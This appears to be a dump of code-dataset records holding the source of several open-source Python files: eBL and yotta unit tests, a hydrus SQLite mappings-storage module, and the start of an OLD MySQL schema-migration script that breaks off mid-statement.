return bmp
#----------------------------------------------------------------------------
| [
"RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775"
] | RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775 |
c52e5a01d006afaa44d941558a3b4413e7d46507 | 2c97e11e13bfbabfdae8979385ba0957c7b11270 | /ebl/tests/corpus/test_text.py | 492a85c0eae4e191f7fa44e750326ebdfcf9d5eb | [
"MIT"
] | permissive | ElectronicBabylonianLiterature/ebl-api | 72a2a95291e502ec89a20ebe5c14447e63ac6d92 | 4910f6fbb57fa213fef55cbe9bc16215aebbaa27 | refs/heads/master | 2023-08-16T12:42:03.303042 | 2023-08-16T10:59:44 | 2023-08-16T10:59:44 | 135,266,736 | 11 | 3 | MIT | 2023-09-12T09:56:14 | 2018-05-29T08:39:58 | Python | UTF-8 | Python | false | false | 679 | py | import pytest
from ebl.transliteration.domain.stage import Stage
from ebl.tests.factories.corpus import ChapterListingFactory, TextFactory
@pytest.mark.parametrize(
"chapters,expected",
[
(tuple(), False),
(ChapterListingFactory.build_batch(2, stage=Stage.NEO_ASSYRIAN), False),
(
[
ChapterListingFactory.build(stage=Stage.NEO_ASSYRIAN),
ChapterListingFactory.build(stage=Stage.OLD_ASSYRIAN),
],
True,
),
],
)
def test_has_multiple_stages(chapters, expected) -> None:
text = TextFactory.build(chapters=chapters)
assert text.has_multiple_stages == expected
| [
"[email protected]"
] | |
917fcebd166d847a92f7e606dacab4fd29e3999f | 3f70e754981a941dbc3a24d15edb0a5abe3d4788 | /yotta/test/test_ignores.py | a2b9a8a7100fa9cee34d536a142b11b4dc2cd2c5 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ARMmbed/yotta | 66cfa634f03a25594311a569ea369a916cff70bf | 82d854b43d391abb5a006b05e7beffe7d0d6ffbf | refs/heads/master | 2023-03-16T11:57:12.852163 | 2021-01-15T13:49:47 | 2021-01-15T13:49:47 | 16,579,440 | 184 | 87 | Apache-2.0 | 2021-01-15T13:46:43 | 2014-02-06T13:03:45 | Python | UTF-8 | Python | false | false | 5,789 | py | #!/usr/bin/env python
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import unittest
import os
# internal modules:
from yotta.lib.detect import systemDefaultTarget
from yotta.lib import component
from yotta.test.cli import cli
from yotta.test.cli import util
Test_Files = {
'.yotta_ignore': '''
#comment
/moo
b/c/d
b/c/*.txt
/a/b/test.txt
b/*.c
/source/a/b/test.txt
/test/foo
sometest/a
someothertest
ignoredbyfname.c
''',
'module.json': '''
{
"name": "test-testdep-f",
"version": "0.0.6",
"description": "Module to test test-dependencies and ignoring things",
"author": "autopulated",
"licenses": [
{
"url": "https://spdx.org/licenses/Apache-2.0",
"type": "Apache-2.0"
}
],
"dependencies": {},
"testDependencies": {}
}
''',
'a/b/c/d/e/f/test.txt': '',
'a/b/c/d/e/test.c': '#error should be ignored',
'a/b/c/d/e/test.txt': '',
'a/b/c/d/test.c': '#error should be ignored',
'a/b/c/d/test.txt': '',
'a/b/c/d/z/test.c':'#error should be ignored',
'a/b/c/test.txt': '',
'a/b/test.txt':'',
'a/test.txt':'',
'comment':'# should not be ignored',
'f/f.h':'''
#ifndef __F_H__
#define __F_H__
int f();
#endif
''',
'source/moo/test.txt':'',
'source/a/b/c/d/e/f/test.txt': '',
'source/a/b/c/d/e/test.c': '#error should be ignored',
'source/a/b/c/d/e/test.txt': '',
'source/a/b/c/d/test.c': '#error should be ignored',
'source/a/b/c/d/test.txt': '',
'source/a/b/c/d/z/test.c':'#error should be ignored',
'source/a/b/c/test.txt': '',
'source/a/b/test.txt':'',
'source/a/test.txt':'',
'source/f.c':'''
int f(){
return 6;
}
''',
'test/anothertest/ignoredbyfname.c':'#error should be ignored',
'test/anothertest/ignoredbyfname.c':'''
#include <stdio.h>
#include "f/f.h"
int main(){
int result = f();
printf("%d\n", result);
return !(result == 6);
}
''',
'test/foo/ignored.c':'''
#error should be ignored
''',
'test/someothertest/alsoignored.c':'''
#error should be ignored
''',
'test/sometest/a/ignored.c':'''
#error should be ignored
'''
}
Default_Test_Files = {
'module.json': '''
{
"name": "test-testdep-f",
"version": "0.0.6",
"license": "Apache-2.0"
}'''
}
def isWindows():
# can't run tests that hit github without an authn token
return os.name == 'nt'
class TestPackIgnores(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.test_dir = util.writeTestFiles(Test_Files)
@classmethod
def tearDownClass(cls):
util.rmRf(cls.test_dir)
def test_absolute_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('moo'))
self.assertTrue(c.ignores('test/foo/ignored.c'))
def test_glob_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('a/b/c/test.txt'))
self.assertTrue(c.ignores('a/b/test.txt'))
self.assertTrue(c.ignores('a/b/test.c'))
self.assertTrue(c.ignores('source/a/b/c/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.c'))
def test_relative_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('a/b/c/d/e/f/test.txt'))
self.assertTrue(c.ignores('a/b/test.txt'))
self.assertTrue(c.ignores('source/a/b/c/d/e/f/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.txt'))
self.assertTrue(c.ignores('test/anothertest/ignoredbyfname.c'))
self.assertTrue(c.ignores('test/someothertest/alsoignored.c'))
def test_default_ignores(self):
default_test_dir = util.writeTestFiles(Default_Test_Files)
c = component.Component(default_test_dir)
self.assertTrue(c.ignores('.something.c.swp'))
self.assertTrue(c.ignores('.something.c~'))
self.assertTrue(c.ignores('path/to/.something.c.swm'))
self.assertTrue(c.ignores('path/to/.something.c~'))
self.assertTrue(c.ignores('.DS_Store'))
self.assertTrue(c.ignores('.git'))
self.assertTrue(c.ignores('.hg'))
self.assertTrue(c.ignores('.svn'))
self.assertTrue(c.ignores('yotta_modules'))
self.assertTrue(c.ignores('yotta_targets'))
self.assertTrue(c.ignores('build'))
self.assertTrue(c.ignores('.yotta.json'))
util.rmRf(default_test_dir)
def test_comments(self):
c = component.Component(self.test_dir)
self.assertFalse(c.ignores('comment'))
@unittest.skipIf(isWindows(), "can't build natively on windows yet")
def test_build(self):
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'clean'], self.test_dir)
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'build'], self.test_dir)
self.assertNotIn('ignoredbyfname', stdout)
self.assertNotIn('someothertest', stdout)
self.assertNotIn('sometest', stdout)
@unittest.skipIf(isWindows(), "can't build natively on windows yet")
def test_test(self):
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'clean'], self.test_dir)
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'test'], self.test_dir)
self.assertNotIn('ignoredbyfname', stdout)
self.assertNotIn('someothertest', stdout)
self.assertNotIn('sometest', stdout)
def runCheckCommand(self, args, test_dir):
stdout, stderr, statuscode = cli.run(args, cwd=self.test_dir)
if statuscode != 0:
print('command failed with status %s' % statuscode)
print(stdout)
print(stderr)
self.assertEqual(statuscode, 0)
return stdout or stderr
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
21592df1ab03e4bc5631a96f3de6b93a787069ac | e6f0d9716288c7a8ac04aad852343177195fe8a4 | /hydrus/client/db/ClientDBMappingsStorage.py | b563cc014146c8b9f8777769f993c37b28e09b00 | [
"WTFPL"
] | permissive | dot1991/hydrus | d5fb7960650c7b0cc999832be196deec073146a2 | e95ddf7fb65e2a1fc82e091473c4c9e6cb09e69d | refs/heads/master | 2023-06-15T19:29:59.477574 | 2021-07-14T20:42:19 | 2021-07-14T20:42:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,221 | py | import sqlite3
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusDBModule
from hydrus.client.db import ClientDBServices
def GenerateMappingsTableNames( service_id: int ) -> typing.Tuple[ str, str, str, str ]:
suffix = str( service_id )
current_mappings_table_name = 'external_mappings.current_mappings_{}'.format( suffix )
deleted_mappings_table_name = 'external_mappings.deleted_mappings_{}'.format( suffix )
pending_mappings_table_name = 'external_mappings.pending_mappings_{}'.format( suffix )
petitioned_mappings_table_name = 'external_mappings.petitioned_mappings_{}'.format( suffix )
return ( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name )
class ClientDBMappingsStorage( HydrusDBModule.HydrusDBModule ):
def __init__( self, cursor: sqlite3.Cursor, modules_services: ClientDBServices.ClientDBMasterServices ):
self.modules_services = modules_services
HydrusDBModule.HydrusDBModule.__init__( self, 'client mappings storage', cursor )
def _GetInitialIndexGenerationTuples( self ):
index_generation_tuples = []
return index_generation_tuples
def CreateInitialTables( self ):
pass
def GetExpectedTableNames( self ) -> typing.Collection[ str ]:
expected_table_names = []
return expected_table_names
def DropMappingsTables( self, service_id: int ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( current_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( deleted_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( pending_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( petitioned_mappings_table_name ) )
def GenerateMappingsTables( self, service_id: int ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( current_mappings_table_name ) )
self._CreateIndex( current_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( deleted_mappings_table_name ) )
self._CreateIndex( deleted_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( pending_mappings_table_name ) )
self._CreateIndex( pending_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, reason_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( petitioned_mappings_table_name ) )
self._CreateIndex( petitioned_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
def GetCurrentFilesCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( DISTINCT hash_id ) FROM {};'.format( current_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetDeletedMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( deleted_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetPendingMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( pending_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetPetitionedMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( petitioned_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetTablesAndColumnsThatUseDefinitions( self, content_type: int ) -> typing.List[ typing.Tuple[ str, str ] ]:
if HC.CONTENT_TYPE_HASH:
tables_and_columns = []
for service_id in self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
tables_and_columns.extend( [
( current_mappings_table_name, 'hash_id' ),
( deleted_mappings_table_name, 'hash_id' ),
( pending_mappings_table_name, 'hash_id' ),
( petitioned_mappings_table_name, 'hash_id' )
] )
return tables_and_columns
elif HC.CONTENT_TYPE_TAG:
tables_and_columns = []
for service_id in self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
tables_and_columns.extend( [
( current_mappings_table_name, 'tag_id' ),
( deleted_mappings_table_name, 'tag_id' ),
( pending_mappings_table_name, 'tag_id' ),
( petitioned_mappings_table_name, 'tag_id' )
] )
return tables_and_columns
return []
| [
"[email protected]"
] | |
ffdee593dfdcf10d8efd3c6153844ea9bd405272 | e5a9f032c160b841fd9cbac9675c06dd2cf4dbe0 | /onlinelinguisticdatabase/model/db_update_scripts/0.2.7_1.0a2/old_update_db_0.2.7_1.0a1.py | 05ac0ab17bcef143916bb8bf823019897ce1b213 | [
"Apache-2.0"
] | permissive | FieldDB/old | bfaa94690dc10f8081ad586663f09b550c2b50aa | f9cdbfe48eb9709f0b2d1e7790e7c2e612937071 | refs/heads/master | 2021-01-21T04:00:01.450384 | 2013-08-13T18:14:32 | 2013-08-13T18:14:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78,347 | py | #!/usr/bin/python
# Copyright 2013 Joel Dunham
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This executable updates an OLD 0.2.7 MySQL database and makes it compatible with
the OLD 1.0a2 data structure
Usage:
$ ./old_update_db_0.2.7_1.0a1.py -d mysql_db_name - u mysql_username -p mysql_password [-f mysql_dump_file_path] [--default-morphemes]
The script will print out a list of warnings or reminders to hand-edit some of the data, as necessary.
The username and password supplied must have full db access, i.e., permission to create, drop and alter
databases, tables, etc.
If the optional ``mysql_dump_file_path`` parameter is not supplied,
ensure that your MySQL server contains an OLD 0.2.7 database called
``mysql_db_name``. If the dump file path paramter is supplied, this script
will drop any database called ``mysql_db_name``, recreate it and populate it
with the data from the dump file.
Please ensure that your MySQL installation is set up to use UTF-8 throughout. This will probably mean
making changes to your MySQL configuration file (/etc/mysql/my.cnf in Debian systems), cf.
http://cameronyule.com/2008/07/configuring-mysql-to-use-utf-8/.
This script will change any non-UTF-8 databases, tables and columns to UTF-8 following the procedure
outlined at https://codex.wordpress.org/Converting_Database_Character_Sets. It will also perform
unicode canonical decompositional normalization on all the data.
Notes on character sets
Get info on the system generally:
$ show variables like "collation%";
$ show variables like "character_set%";
Get info on the databases:
$ select schema_name, default_character_set_name, default_collation_name from information_schema.schemata;
Get info on the tables:
$ select table_name, table_collation from information_schema.tables where table_schema="...";
Get info on the columns:
$ select column_name, collation_name from information_schema.columns where table_schema="..." and table_name="...";
select table_name, column_name, collation_name from information_schema.columns where table_schema='old_test' order by table_name and column_name;
"""
import os
import sys
import re
import string
import subprocess
import datetime
import unicodedata
from random import choice, shuffle
from uuid import uuid4
from sqlalchemy import create_engine, MetaData, Table, bindparam
from docutils.core import publish_parts
from passlib.hash import pbkdf2_sha512
try:
import json
except ImportError:
import simplejson as json
# update_SQL holds the SQL statements that create the 1.0 tables missing in 0.2.7 and
# alter the existing tables.
update_SQL = '''
-- Create the applicationsettingsuser table
CREATE TABLE `applicationsettingsuser` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`applicationsettings_id` int(11) DEFAULT NULL,
`user_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `applicationsettings_id` (`applicationsettings_id`),
KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- Create the orthography table
CREATE TABLE `orthography` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) DEFAULT NULL,
`orthography` text,
`lowercase` tinyint(1) DEFAULT NULL,
`initial_glottal_stops` tinyint(1) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- Modify the application_settings table as needed
RENAME TABLE application_settings TO applicationsettings;
UPDATE applicationsettings
SET morphemeBreakIsObjectLanguageString=1
WHERE morphemeBreakIsObjectLanguageString='yes';
UPDATE applicationsettings
SET morphemeBreakIsObjectLanguageString=0
WHERE morphemeBreakIsObjectLanguageString!='yes';
ALTER TABLE applicationsettings
-- The following CONVERT clause may change TEXTs to MEDIUMTEXTS, cf. http://bugs.mysql.com/bug.php?id=31291
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE objectLanguageId object_language_id VARCHAR(3) DEFAULT NULL,
CHANGE objectLanguageName object_language_name VARCHAR(255) DEFAULT NULL,
CHANGE metaLanguageId metalanguage_id VARCHAR(3) DEFAULT NULL,
CHANGE metaLanguageName metalanguage_name VARCHAR(255) DEFAULT NULL,
CHANGE metaLanguageOrthography metalanguage_inventory TEXT,
CHANGE orthographicValidation orthographic_validation VARCHAR(7) DEFAULT NULL,
CHANGE punctuation punctuation TEXT,
CHANGE narrPhonInventory narrow_phonetic_inventory TEXT,
CHANGE narrPhonValidation narrow_phonetic_validation VARCHAR(7) DEFAULT NULL,
CHANGE broadPhonInventory broad_phonetic_inventory TEXT,
CHANGE broadPhonValidation broad_phonetic_validation VARCHAR(7) DEFAULT NULL,
CHANGE morphemeBreakIsObjectLanguageString morpheme_break_is_orthographic tinyint(1) DEFAULT NULL,
CHANGE morphPhonValidation morpheme_break_validation VARCHAR(7) DEFAULT NULL,
CHANGE morphPhonInventory phonemic_inventory TEXT,
CHANGE morphDelimiters morpheme_delimiters VARCHAR(255) DEFAULT NULL,
DROP COLUMN headerImageName,
DROP COLUMN colorsCSS,
ADD storage_orthography_id int(11) DEFAULT NULL,
ADD input_orthography_id int(11) DEFAULT NULL,
ADD output_orthography_id int(11) DEFAULT NULL,
ADD KEY (storage_orthography_id),
ADD KEY (input_orthography_id),
ADD KEY (output_orthography_id);
-- Change the collection table
ALTER TABLE collection
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
MODIFY contents TEXT,
MODIFY description TEXT,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
ADD COLUMN html TEXT,
ADD COLUMN modifier_id INT(11) DEFAULT NULL,
ADD COLUMN contents_unpacked TEXT,
ADD KEY (modifier_id);
UPDATE collection SET markup_language = 'restructuredText';
-- Change the collectionbackup TABLE
ALTER TABLE collectionbackup
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
ADD COLUMN html TEXT,
ADD COLUMN modifier TEXT,
MODIFY speaker TEXT,
MODIFY elicitor TEXT,
MODIFY enterer TEXT,
MODIFY description TEXT,
MODIFY contents TEXT,
MODIFY source TEXT,
MODIFY files TEXT,
ADD COLUMN forms TEXT,
ADD COLUMN tags TEXT;
UPDATE collectionbackup SET markup_language = 'restructuredText';
ALTER TABLE collectionfile
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
ALTER TABLE collectionform
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `collectiontag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`collection_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `collection_id` (`collection_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpus` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`content` longtext,
`enterer_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`form_search_id` int(11) DEFAULT NULL,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `enterer_id` (`enterer_id`),
KEY `modifier_id` (`modifier_id`),
KEY `form_search_id` (`form_search_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusbackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`type` varchar(255) DEFAULT NULL,
`description` text,
`content` longtext,
`enterer` text,
`modifier` text,
`form_search` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`tags` text,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusfile` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`filename` varchar(255) DEFAULT NULL,
`format` varchar(255) DEFAULT NULL,
`creator_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`datetime_created` datetime DEFAULT NULL,
`restricted` tinyint(1) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `creator_id` (`creator_id`),
KEY `modifier_id` (`modifier_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusform` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`form_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `form_id` (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpustag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE elicitationmethod
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
MODIFY description TEXT;
ALTER TABLE file
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE MIMEtype MIME_type VARCHAR(255) DEFAULT NULL,
CHANGE utteranceType utterance_type VARCHAR(255) DEFAULT NULL,
ADD COLUMN filename VARCHAR(255) DEFAULT NULL,
ADD COLUMN lossy_filename VARCHAR(255) DEFAULT NULL,
MODIFY description TEXT,
CHANGE embeddedFileMarkup url VARCHAR(255) DEFAULT NULL,
CHANGE embeddedFilePassword password VARCHAR(255) DEFAULT NULL,
ADD COLUMN parent_file_id INT(11) DEFAULT NULL,
ADD COLUMN start FLOAT DEFAULT NULL,
ADD COLUMN end FLOAT DEFAULT NULL,
ADD KEY (parent_file_id),
ADD UNIQUE (filename),
DROP INDEX name;
CREATE TABLE `filetag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`file_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `file_id` (`file_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE form
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE phoneticTranscription phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE narrowPhoneticTranscription narrow_phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE morphemeBreak morpheme_break VARCHAR(255) DEFAULT NULL,
CHANGE morphemeGloss morpheme_gloss VARCHAR(255) DEFAULT NULL,
CHANGE syntacticCategoryString syntactic_category_string VARCHAR(255) DEFAULT NULL,
CHANGE breakGlossCategory break_gloss_category VARCHAR(1023) DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY comments TEXT,
CHANGE speakerComments speaker_comments TEXT,
CHANGE morphemeBreakIDs morpheme_break_ids TEXT,
CHANGE morphemeGlossIDs morpheme_gloss_ids TEXT,
ADD COLUMN syntax VARCHAR(1023) DEFAULT NULL,
ADD COLUMN semantics VARCHAR(1023) DEFAULT NULL,
ADD COLUMN status VARCHAR(40) DEFAULT NULL,
ADD COLUMN modifier_id INT(11) DEFAULT NULL,
ADD KEY (modifier_id);
UPDATE form SET status='tested';
ALTER TABLE formbackup
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE phoneticTranscription phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE narrowPhoneticTranscription narrow_phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE morphemeBreak morpheme_break VARCHAR(255) DEFAULT NULL,
CHANGE morphemeGloss morpheme_gloss VARCHAR(255) DEFAULT NULL,
CHANGE syntacticCategoryString syntactic_category_string VARCHAR(255) DEFAULT NULL,
CHANGE breakGlossCategory break_gloss_category VARCHAR(1023) DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY comments TEXT,
CHANGE speakerComments speaker_comments TEXT,
CHANGE morphemeBreakIDs morpheme_break_ids TEXT,
CHANGE morphemeGlossIDs morpheme_gloss_ids TEXT,
MODIFY elicitor TEXT,
MODIFY enterer TEXT,
MODIFY verifier TEXT,
MODIFY speaker TEXT,
CHANGE elicitationMethod elicitation_method TEXT,
CHANGE syntacticCategory syntactic_category TEXT,
MODIFY source TEXT,
MODIFY files TEXT,
CHANGE keywords tags TEXT,
CHANGE glosses translations TEXT,
ADD COLUMN syntax VARCHAR(1023) DEFAULT NULL,
ADD COLUMN semantics VARCHAR(1023) DEFAULT NULL,
ADD COLUMN modifier TEXT;
ALTER TABLE formfile
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `formsearch` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) DEFAULT NULL,
`search` text,
`description` text,
`enterer_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `enterer_id` (`enterer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
RENAME TABLE formkeyword TO formtag;
ALTER TABLE formtag
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE keyword_id tag_id INT(11) DEFAULT NULL,
ADD KEY (tag_id);
RENAME TABLE gloss TO translation;
ALTER TABLE translation
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE gloss transcription TEXT NOT NULL,
CHANGE glossGrammaticality grammaticality VARCHAR(255) DEFAULT NULL;
RENAME TABLE keyword TO tag;
ALTER TABLE tag
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
MODIFY description TEXT,
ADD UNIQUE (name);
ALTER TABLE language
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `morphology` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`script_type` varchar(5) DEFAULT NULL,
`lexicon_corpus_id` int(11) DEFAULT NULL,
`rules_corpus_id` int(11) DEFAULT NULL,
`enterer_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`compile_succeeded` tinyint(1) DEFAULT NULL,
`compile_message` varchar(255) DEFAULT NULL,
`compile_attempt` varchar(36) DEFAULT NULL,
`generate_attempt` varchar(36) DEFAULT NULL,
`extract_morphemes_from_rules_corpus` tinyint(1) DEFAULT NULL,
`rules_generated` text,
